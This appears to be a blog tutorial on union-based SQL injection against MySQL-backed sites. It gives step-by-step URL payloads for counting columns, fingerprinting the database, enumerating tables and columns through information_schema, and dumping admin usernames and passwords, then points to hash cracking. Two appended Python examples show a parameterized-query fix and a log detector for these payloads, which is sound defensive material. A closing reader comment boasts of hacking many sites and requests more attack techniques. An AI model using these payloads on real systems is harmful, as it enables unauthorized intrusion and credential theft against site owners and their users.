There are many types of SQL injection, but in this tutorial I will explain how you can extract columns and tables containing useful data such as passwords, user IDs, emails, admin passwords and IDs, etc.
How To Find a Vulnerable Site?
There are many ways to find vulnerable web sites: finding vulnerabilities manually or using web scanners. For more, you can refer to my post on How to Find Vulnerable Sites.
Exploiting The Vulnerability
Now say we have found a vulnerable site. Add ' at the end of the URL, and if it returns an error message then the site is vulnerable.
Example:-
www.vulnarable site.net/articles.php?id =1 ‘
Now we need to find the number of columns in the current table.
For this we use the "order by" command. Add order by 1 -- to the end of the URL, and increase the number till we get an error message.
Example:-
www.vulnarable site.net/articles.php?id =1 order by 1--
www.vulnarable site.net/articles.php?id =1 order by 2--
www.vulnarable site.net/articles.php?id =1 order by 3--
www.vulnarable site.net/articles.php?id =1 order by 4--
www.vulnarable site.net/articles.php?id =1 order by 5 --
And so on till we get an error message.
Say we get an error message when we enter order by 5 --
Then the number of columns in the database is 4.
Now we use the "union all select" command to find the vulnerable column.
Add union all select followed by the numbers from 1 up to the number of columns that we found in the last step.
Example:-
www.vulnarable site.net/articles.php?id =1 union all select 1,2,3,4 --
Now we should find some numbers popping out.
Say we find one number, 3; then column 3 is vulnerable.
We can find the database version, name and user. We do this by replacing the vulnerable column numbers with the following commands:
user(), database(), version(), @@user, @@version, @@database
The first thing is to find the version of MySQL. We add "@@version", replacing the vulnerable column.
Example:-
www.vulnarable site.net/articles.php?id =1 union all select 1,2,@@version ,4 --
Now we must see the version of MySQL at the place where the number popped out in the previous step. If it is above 5, continue reading. If it is 4 or below, then you have to brute force or guess the table and column names.
Now we need to find all the table names in the database. To do this we use the following commands:
table_name, information_schema.tables
Example:-
www.vulnarable site.net/articles.php?id =1 Union all select 1,2,table_name,4 from information_schema.tables --
Remember, the "table_name" goes in the vulnerable column number you found earlier. If this command is entered correctly, the page should show all the tables in the database, so look for tables that may contain useful information such as admin tables or member or user tables, and so on.
Now we must find all the column names in the database. To do this we use the following command: "group_concat(column_name)".
Example:-
www.vulnerable site.net/articles.php?id =1 Union all select 1,2,group_concat(column_name) ,4 from information_schema.columns --
Now look for interesting names such as user name, id, email and password, and so on.
Finally we need to dump the data from the columns corresponding to the tables.
For this we use the group_concat command.
Now say we want to get the "user id", "username" and "password" fields from the table "admin"; we use the group_concat command.
Example:-
www.vulnerable site.net/articles.php?id =1 Union all select 1,2,group_concat(user id ,0x3a, username,0x3a,password),4 from admin--
If the command is successful we must find the user id, user name and password.
Example:-
1 : admin : pass
2 : user : password
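Why the steps above work, and how the query is fixed, shown as an added example that is not part of the original tutorial. It assumes a hypothetical 4-column articles table and uses Python's built-in SQLite in place of MySQL; all function names are made up for illustration.

```python
import re
import sqlite3

def make_db():
    # Constructed sample data: a 4-column table, matching the tutorial's column count.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT, body TEXT, author TEXT)")
    db.execute("INSERT INTO articles VALUES (1, 'Hello', 'First post', 'editor')")
    return db

def fetch_vulnerable(db, article_id):
    # Flaw: the request parameter is pasted into the SQL text, so everything
    # after the number is parsed as part of the statement.
    return db.execute("SELECT * FROM articles WHERE id = " + article_id).fetchall()

def fetch_hardened(db, article_id):
    # Layer 1: the parameter must be a plain decimal integer, nothing else.
    if not re.fullmatch(r"[0-9]{1,10}", article_id):
        return []
    # Layer 2: bind the value; it travels as data and is never parsed as SQL.
    return db.execute("SELECT * FROM articles WHERE id = ?", (int(article_id),)).fetchall()

def leaks_error(db, article_id):
    # True when the raw database error would reach the caller, which is what
    # the quote and "order by" probes rely on.
    try:
        fetch_vulnerable(db, article_id)
        return False
    except sqlite3.Error:
        return True

if __name__ == "__main__":
    db = make_db()
    probe = "1 union all select 1,2,3,4 --"   # string taken from the tutorial
    print("vulnerable:", fetch_vulnerable(db, probe))
    print("hardened:  ", fetch_hardened(db, probe))
    print("order by 5 raises:", leaks_error(db, "1 order by 5 --"))
```

The same two layers apply to the PHP page in the tutorial: validate the id as an integer and use a prepared statement, and return a generic error page instead of the database error text.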
Most of the time the passwords are encrypted; to crack them, refer to my posts on Hashes and Salts.
Hope you enjoyed this tutorial. If you have any doubts, please feel free to comment.
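For spotting this walk-through in web server logs, the following added example (not part of the original tutorial) tags each request with the phase it matches and reports clients that hit more than one phase. The log lines, IP addresses and paths are constructed sample data, and the stage names are made up for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# One pattern per phase of the walk-through, matched on the decoded URL.
STAGES = [
    ("column_count", re.compile(r"\border by \d+")),
    ("union_probe", re.compile(r"\bunion (all )?select\b")),
    ("fingerprint", re.compile(r"@@version|\b(version|user|database)\(\)")),
    ("schema_enum", re.compile(r"\binformation_schema\.(tables|columns)\b")),
    ("data_dump", re.compile(r"\bgroup_concat ?\(")),
]
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP')

# Constructed access-log lines (documentation IP ranges, hypothetical paths).
SAMPLE_LOG = [
    '198.51.100.4 - - [10/Oct/2023:13:55:01 +0000] "GET /articles.php?id=1 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /articles.php?id=1%20order%20by%205%20-- HTTP/1.1" 500 312',
    '203.0.113.7 - - [10/Oct/2023:13:55:50 +0000] "GET /articles.php?id=1+union+all+select+1,2,@@version,4+-- HTTP/1.1" 200 5210',
    '203.0.113.7 - - [10/Oct/2023:13:56:02 +0000] "GET /articles.php?id=1%20Union%20all%20select%201,2,table_name,4%20from%20information_schema.tables%20-- HTTP/1.1" 200 9034',
    '198.51.100.9 - - [10/Oct/2023:13:57:10 +0000] "GET /search.php?q=how+to+order+by+2+columns HTTP/1.1" 200 2048',
]

def stages_in(url):
    # Undo %xx and '+' encoding, then fold case and whitespace before matching.
    text = re.sub(r"\s+", " ", unquote_plus(url).lower())
    return [name for name, rx in STAGES if rx.search(text)]

def scan(lines, min_stages=2):
    # Collect phases per client; one phase alone is too noisy to alert on.
    seen = defaultdict(set)
    for line in lines:
        m = REQUEST.match(line)
        if m:
            seen[m.group(1)].update(stages_in(m.group(2)))
    return {ip: sorted(s) for ip, s in seen.items() if len(s) >= min_stages}

if __name__ == "__main__":
    for ip, stages in scan(SAMPLE_LOG).items():
        print(ip, "->", ", ".join(stages))
```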
Hey bro, all your posts on SQLi are very nice! Good work! Actually I already hacked so many sites with these methods, and I'm also rooting on some of them ;)
Reason to surf your website is to find some advanced topics on SQLi, like:
1- POST SQLi tut
2- cookie-based SQLi.
Because I'm messing with these .... also some other topics like
1- some MD5 hashes are not cracked online, tools take so much time to crack..
2- common but very irritating admin page finding :/ Havij, Perl scripts, online sites fail to find the admin page of some sites, then what to do... ! Please reply, and yeah, make a tut on POST SQLi, cookie SQLi..! :p